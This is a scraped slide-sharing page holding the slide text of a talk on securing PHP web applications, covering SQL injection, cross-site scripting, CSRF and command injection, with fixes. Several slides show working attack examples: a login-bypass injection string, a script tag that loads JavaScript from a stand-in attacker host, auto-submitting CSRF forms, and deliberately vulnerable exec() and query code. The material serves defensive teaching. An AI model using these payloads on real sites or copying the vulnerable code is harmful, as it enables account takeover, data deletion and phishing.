Cybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure ADCybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure AD
VICTOR MAESTRE RAMIREZ
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-UmgebungenHCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
panagenda
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 
Drupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy ConsumptionDrupalcamp Finland – Measuring Front-end Energy Consumption
Drupalcamp Finland – Measuring Front-end Energy Consumption
Exove
 
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdfThe Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
The Evolution of Meme Coins A New Era for Digital Currency ppt.pdf
Abi john
 
Quantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur MorganQuantum Computing Quick Research Guide by Arthur Morgan
Quantum Computing Quick Research Guide by Arthur Morgan
Arthur Morgan
 
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdfComplete Guide to Advanced Logistics Management Software in Riyadh.pdf
Complete Guide to Advanced Logistics Management Software in Riyadh.pdf
Software Company
 
Linux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdfLinux Professional Institute LPIC-1 Exam.pdf
Linux Professional Institute LPIC-1 Exam.pdf
RHCSA Guru
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Cyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of securityCyber Awareness overview for 2025 month of security
Cyber Awareness overview for 2025 month of security
riccardosl1
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
Semantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AISemantic Cultivators : The Critical Future Role to Enable AI
Semantic Cultivators : The Critical Future Role to Enable AI
artmondano
 
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded DevelopersLinux Support for SMARC: How Toradex Empowers Embedded Developers
Linux Support for SMARC: How Toradex Empowers Embedded Developers
Toradex
 
Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025Splunk Security Update | Public Sector Summit Germany 2025
Splunk Security Update | Public Sector Summit Germany 2025
Splunk
 
Cybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure ADCybersecurity Identity and Access Solutions using Azure AD
Cybersecurity Identity and Access Solutions using Azure AD
VICTOR MAESTRE RAMIREZ
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
IEDM 2024 Tutorial2_Advances in CMOS Technologies and Future Directions for C...
organizerofv
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Enhancing ICU Intelligence: How Our Functional Testing Enabled a Healthcare I...
Impelsys Inc.
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-UmgebungenHCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
HCL Nomad Web – Best Practices und Verwaltung von Multiuser-Umgebungen
panagenda
 
Electronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploitElectronic_Mail_Attacks-1-35.pdf by xploit
Electronic_Mail_Attacks-1-35.pdf by xploit
niftliyevhuseyn
 

PHPUG Presentation

  • 1. Securing PHP Web Applications Web Applications Damon P. Cortesi, CISSP Directory @ Alchemy Security Stats Nut | Security Geek | Builder of Tools
  • 2. $ whoami Security Consultant Part-time Web Dev (PHP, Django, Rails) Destroyer of Web Apps and Dual-Cores
  • 3. <?=presoinfo();?> Typical web application vulnerabilities SQL Injection Cross-Site Scripting What to watch out for How to secure your PHP apps
  • 4. SQL Injection $sql = “SELECT * FROM users WHERE username = ‘“ . $_POST[‘username’] . “‘ AND password = ‘“ . $_POST[‘password’] . “‘“; What if username is: “dpc’ or ‘a’=’a” ? ... username = ‘ dpc’ or ‘a’=’a ‘ ...
  • 6. SQL Injection Username: dpc SELECT * FROM users WHERE username = ‘dpc‘ AND password = ‘apassword’; Username: dpc’ OR ‘A’=’A SELECT * FROM users WHERE username = ‘dpc ’ OR ‘A’=’A ‘ AND password = ‘apassword’;
  • 7. Cross-Site Scripting User input re-displayed in browser and interpreted as HTML or ... JavaScript My name is Damon”><script>alert(‘hi’)</script> Why is this bad? Phishing Cookie stealing Arbitrary JavaScript execution...
  • 8. XSS Example Ability to spoof an entire site by including JavaScript from elsewhere http://realsite.com/projects/search?q=test ”><script src=” http://badsite.com/evilphishingpage.js ”></script>... JavaScript can rewrite any DOM element...
  • 9. Real-world Dangers We live in an interactive web
  • 10. So what? I run a blog ... XSS me all day long ... I DON’T CARE! Fair enough. Importance of security is directly proportional to level of risk. Blog != Payment Gateway.
  • 11. Coder for Hire? Are you willing to put your company reputation at stake? What type of apps are you building? Where _might_ your code be used? Themes? Plugins? include(‘wp_story’);
  • 12. Common Mitigations “Increase your security by 80%, by fixing 20% of the problems.” Input Sanitization and Validation Data Encoding and Escaping
  • 13. Sanitization/Encoding SQL: mysql_real_escape_string() HTML/XSS: htmlentities() “ <b>Damon</b> >> &quot;&lt;b&gt;Damon&lt;/b&gt; Beware encoding
  • 14. Input Sanitization Fail exec(mysql_escape_string($_GET[‘var’])) Problem #1: mysql_escape_string is deprecated. Problem #2: MySQL escape does not make it safe for exec(). ?? preg_match(&quot;/.jpe?g$/i&quot;, $var) exec ( &quot;convert '&quot; . mysql_escape_string ( $path ) . &quot;' /tmp/'&quot; . mysql_escape_string ( basename ( $path )). &quot;'.png&quot; );
  • 15. Better? Instead of dynamically constructing SQL queries...use a framework. CodeIgniter, CakePHP, Zend Or build a db.inc.php (but not a db.inc). Use an output library that automatically escapes.
  • 16. Server-Side Checks Client-side code can be modified HTTP Proxies Toolbars Super-hack “save to disk” & modify Validate all user input with server-side code
  • 17. Bug Hunting Data Inputs $_GET, $_POST, $_REQUEST $_SERVER[‘QUERY_STRING’] $_SERVER[‘PHP_SELF’] $_COOKIE Shell commands: exec()
  • 18. Cross-Site Request Forgery Let’s Google for “javascript are you sure?” First result (circa 2006) is susceptible to CSRF (and probably SQL Injection). What is this CSRF?
  • 19. GET CSRF delete.php?id=123 An action that modifies data called via HTTP GET (against HTTP specs). <img src=” http://x.com/delete.php?id=123” />
  • 20. POST CSRF Only difference: JavaScript required to automate attack. <form name=”csrf” action=” http://x.com/delete.php ” method=”POST”> <input type=”hidden” name=”id” value=”123”> </form> <script>document.csrf.submit()</script>
  • 22. Fixing CSRF Do not modify data using GET Use tokens on all form POSTs per-session per-form Up to you - convenience vs. security
  • 23. Other Protections Secure Cookie Flag Restricts transmission of cookies set via HTTPS HTTPOnly Cookie Flag Can’t be accessed using <script> Use innerText, not innerHTML
  • 24. 3rd Party Plugins Need a plugin or specific function? Google. Download. Hackhack. It works! Is that code secure? (See prev. CSRF)
  • 25. Server Config Not always some über-technical sploit... /phpMyAdmin unprotected? demo/demo password Email on confirmation page
  • 26. Location: $references Chris Shiflett: http://shiflett.org / Essential PHP Security PHP Manual: http://www.php.net/manual/en/security.php Disable register_globals Disabled by default in PHP > 4.2.0 http://www.owasp.org/index.php/PHP_Top_5 http://startupsecurity.info